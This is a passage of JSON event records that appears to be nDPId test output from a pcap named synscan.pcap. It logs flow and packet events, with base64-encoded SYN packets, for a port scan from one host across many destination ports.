+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAshrwAADsGhrasEAAIQA2GNIzSAS3dUoMYAAAAAGACEAAnYgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAscvcAADcGnnusEAAIQA2GNIzSBDbdUoMYAAAAAGACEAAkWQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6vkAADMGKnmsEAAIQA2GNIzTPpDdU4MZAAAAAGACEADp+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsHf8AADQG9nOsEAAIQA2GNIzTBPfdU4MZAAAAAGACBAAvlQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs+ZUAAC4GIN2sEAAIQA2GNIzTIADdU4MZAAAAAGACDAAMjAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIsAACoGYeesEAAIQA2GNIzTySXdU4MZAAAAAGACDABjZgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs728AAC8GKgOsEAAIQA2GNIzTACrdU4MZAAAAAGACEAAoYgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2IAACsGfhCsEAAIQA2GNIzTdTDdU4MZAAAAAGACEACzWwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsaiIAADUGqVCsEAAIQA2GNIzTEyTdU4MZAAAAAGACCAAdaAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADEGgdysEAAIQA2GNIzTD5vdU4MZAAAAAGACCAAg8QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAADgGTEqsEAAIQA2GNIzTBBzdU4MZAAAAAGACBAAwcAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6LcAADgGJ7usEAAIQA2GNIzTBD7dU4MZAAAAAGACBAAwTgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsmusAACsGgoesEAAIQA2GNIzTDdrdU4MZAAAAAGACEAAasgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN8AADAGE5SsEAAIQA2GNIzTTYLdU4MZAAAAAGACBADnCQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6BkAADcGKVmsEAAIQA2GNIzTS3PdU4MZAAAAAGACEADdGAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAspmYAACkGeQysEAAIQA2GNIzTBMLdU4MZAAAAAGACCAArygAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsgl0AACUGoRWsEAAIQA2GNIzSAG3dUoMYAAAAAGACCAAwIgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsoOwAACYGgYasEAAIQA2GNIzSB8\/dUoMYAAAAAGACDAAkwAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3VgAACgGQxqsEAAIQA2GNIzSEB3dUoMYAAAAAGACBAAkcgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zgAADQGNTqsEAAIQA2GNIzSL+ndUoMYAAAAAGACBAAEpgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsarwAADIGq7asEAAIQA2GNIzSwAvdUoMYAAAAAGACDABsgwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAswXIAAC4GWQCsEAAIQA2GNIzSBD3dUoMYAAAAAGACDAAoUgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsAosAADQGEeisEAAIQA2GNIzSFyLdUoMYAAAAAGACBAAdbQAAAgQFtA=="} 